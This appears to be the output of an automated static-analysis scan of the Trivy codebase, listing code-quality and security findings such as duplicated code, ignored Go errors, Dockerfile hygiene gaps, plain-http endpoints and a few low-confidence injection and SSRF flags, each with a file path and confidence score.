Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
pkg/detector/ospkg/photon/photon.go:47
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
pkg/detector/ospkg/redhat/redhat.go:143
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
pkg/detector/ospkg/rocky/rocky.go:43
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
pkg/detector/ospkg/seal/seal.go:89
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
pkg/detector/ospkg/suse/suse.go:110
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
pkg/detector/ospkg/suse/suse.go:114
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
pkg/detector/ospkg/wolfi/wolfi.go:35
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
pkg/detector/ospkg/wolfi/wolfi.go:41
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:7
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/zlib41bd3946e7341/e/conanfile.py:1
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
pkg/fanal/analyzer/language/java/gradle/lockfile.go:74
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
pkg/fanal/analyzer/language/java/gradle/pom.go:43
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
pkg/fanal/analyzer/os/redhatbase/centos.go:1
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
pkg/fanal/analyzer/os/redhatbase/fedora.go:1
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
pkg/fanal/analyzer/os/redhatbase/oracle.go:1
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
pkg/fanal/analyzer/os/redhatbase/rocky.go:1
· conf 0.86
Duplicated implementation block across source filesDKR008
.dockerignore misses sensitive defaults
.dockerignore
· conf 0.72
.dockerignore misses sensitive defaultsDKR012
Dockerfile keeps pip download cache
docs/build/Dockerfile:6
· conf 0.72
Dockerfile keeps pip download cacheERR003
[ERR003] Ignored Error (Go): Ignoring error return values.
pkg/cache/client.go:72
· conf 1.00
[ERR003] Ignored Error (Go): Ignoring error return values.ERR003
[ERR003] Ignored Error (Go): Ignoring error return values.
pkg/dependency/parser/golang/binary/parse.go:64
· conf 1.00
[ERR003] Ignored Error (Go): Ignoring error return values.ERR003
[ERR003] Ignored Error (Go): Ignoring error return values.
pkg/dependency/parser/java/pom/pom.go:343
· conf 1.00
[ERR003] Ignored Error (Go): Ignoring error return values.SEC075
Dockerfile: no HEALTHCHECK
pkg/fanal/analyzer/buildinfo/dockerfile.go:1
· conf 1.00
[SEC075] Dockerfile: no HEALTHCHECK: No HEALTHCHECK directive — orchestrators can't detect a wedged process. Ported from trivy DS026 / checkov CKV_DOCKER_2 (Apache-2.0). Implement file-level: skip if…SEC075
Dockerfile: no HEALTHCHECK
pkg/fanal/analyzer/config/dockerfile/docker.go:1
· conf 1.00
[SEC075] Dockerfile: no HEALTHCHECK: No HEALTHCHECK directive — orchestrators can't detect a wedged process. Ported from trivy DS026 / checkov CKV_DOCKER_2 (Apache-2.0). Implement file-level: skip if…SEC075
Dockerfile: no HEALTHCHECK
pkg/fanal/analyzer/imgconf/dockerfile/dockerfile.go:1
· conf 1.00
[SEC075] Dockerfile: no HEALTHCHECK: No HEALTHCHECK directive — orchestrators can't detect a wedged process. Ported from trivy DS026 / checkov CKV_DOCKER_2 (Apache-2.0). Implement file-level: skip if…ERR003
[ERR003] Ignored Error (Go): Ignoring error return values.
[ERR003] Ignored Error (Go) (and 46 more): Same pattern found in 46 additional files. Review if needed.MINED004
Weak Crypto
CWE-327
[MINED004] Weak Crypto (and 9 more): Same pattern found in 9 additional files. Review if needed.MINED016
Go Error Ignored
CWE-754
[MINED016] Go Error Ignored (and 7 more): Same pattern found in 7 additional files. Review if needed.MINED043
Http Not Https
CWE-319
[MINED043] Http Not Https (and 1 more): Same pattern found in 1 additional files. Review if needed.MINED043
Http Not Https
CWE-319
internal/testutil/localstack.go:47
· conf 1.00
[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data.MINED043
Http Not Https
CWE-319
pkg/fanal/image/daemon/podman.go:20
· conf 1.00
[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data.MINED043
Http Not Https
CWE-319
pkg/sbom/sbom.go:98
· conf 1.00
[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data.MINED044
Js Console Log Prod
CWE-532
.github/actions/trivy-triage/helpers.js:13
· conf 1.00
[MINED044] Js Console Log Prod: console.log left in code. Should be replaced with logger or removed.MINED060
Go Context No Cancel
CWE-401
[MINED060] Go Context No Cancel (and 5 more): Same pattern found in 5 additional files. Review if needed.MINED060
Go Context No Cancel
CWE-401
cmd/trivy/main.go:38
· conf 1.00
[MINED060] Go Context No Cancel: context.Background() at request handler boundary leaks goroutines.MINED060
Go Context No Cancel
CWE-401
magefiles/spdx.go:84
· conf 1.00
[MINED060] Go Context No Cancel: context.Background() at request handler boundary leaks goroutines.MINED060
Go Context No Cancel
CWE-401
pkg/iac/rego/load.go:330
· conf 1.00
[MINED060] Go Context No Cancel: context.Background() at request handler boundary leaks goroutines.MINED071
Go Panic Call
CWE-755
[MINED071] Go Panic Call (and 5 more): Same pattern found in 5 additional files. Review if needed.MINED071
Go Panic Call
CWE-755
internal/testutil/image.go:27
· conf 1.00
[MINED071] Go Panic Call: panic() crashes the process. Should return error in most cases.MINED071
Go Panic Call
CWE-755
misc/eol/main.go:23
· conf 1.00
[MINED071] Go Panic Call: panic() crashes the process. Should return error in most cases.MINED071
Go Panic Call
CWE-755
pkg/iac/rego/convert/slice.go:17
· conf 1.00
[MINED071] Go Panic Call: panic() crashes the process. Should return error in most cases.SEC020
Secret Printed to Logs
pkg/iac/scanners/terraform/parser/resolvers/registry.go:72
· conf 0.15
[SEC020] Secret Printed to Logs: Debug or diagnostic code appears to print a credential-bearing value. This is a frequent AI-assisted coding failure: the helper exposes the exact value needed for tro…SEC029
Server-Side Request Forgery (SSRF) — outbound HTTP from user input
[SEC029] Server-Side Request Forgery (SSRF) — outbound HTTP from user input (and 12 more): Same pattern found in 12 additional files. Review if needed.SEC045
eval()/exec() on stored or user-supplied data
pkg/iac/rego/scanner.go:143
· conf 0.10
[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data — even admin-stored data — is a lateral-movement vector after any one credential compromise. Sandboxes (__builtins__ …SEC045
eval()/exec() on stored or user-supplied data
pkg/result/filter.go:316
· conf 0.10
[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data — even admin-stored data — is a lateral-movement vector after any one credential compromise. Sandboxes (__builtins__ …SEC069
Dockerfile: no USER directive (runs as root)
[SEC069] Dockerfile: no USER directive (runs as root) (and 3 more): Same pattern found in 3 additional files. Review if needed.SEC075
Dockerfile: no HEALTHCHECK
[SEC075] Dockerfile: no HEALTHCHECK (and 3 more): Same pattern found in 3 additional files. Review if needed.Reading from rp.scan + rp.finding + rp.rule (unified schema, R78 series). Legacy data path unchanged. Compare with /scan/6d822e81-bd19-495a-8800-a4180542b150/.